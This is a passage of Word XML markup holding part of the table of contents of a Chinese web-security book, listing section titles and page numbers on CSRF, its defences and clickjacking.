        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>策略</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>P3P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>头的副作用</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>113</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2123" w:val="left" w:leader="none"/>
          <w:tab w:pos="2124" w:val="left" w:leader="none"/>
          <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2123" w:right="0" w:hanging="598"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST?</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>116</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="105" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CSRF</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="105" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Worm</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="58" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>防御</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="81"/>
        <w:ind w:left="1525" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4.3.1</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>验证码</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Check</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2122" w:val="left" w:leader="none"/>
          <w:tab w:pos="2124" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="105" w:after="0"/>
        <w:ind w:left="2123" w:right="0" w:hanging="598"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Anti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Token</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>121</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="58"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.740pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1408" coordorigin="254,395" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:394;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1195;top:416;width:7261;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>点</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>击</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>劫</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>持</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>（</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>ClickJacking</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>）</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>125</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:462;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>5</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>4.4</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>124</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="333" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="893" w:after="0"/>
        <w:ind w:left="332" w:right="0" w:hanging="129"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="90"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="124" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>什</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>击劫持</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>125</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>劫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>持</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>片覆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>攻击</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>拖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>拽劫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>与数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>窃取</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>131</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>3.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>触</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>屏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>劫持</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>134</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
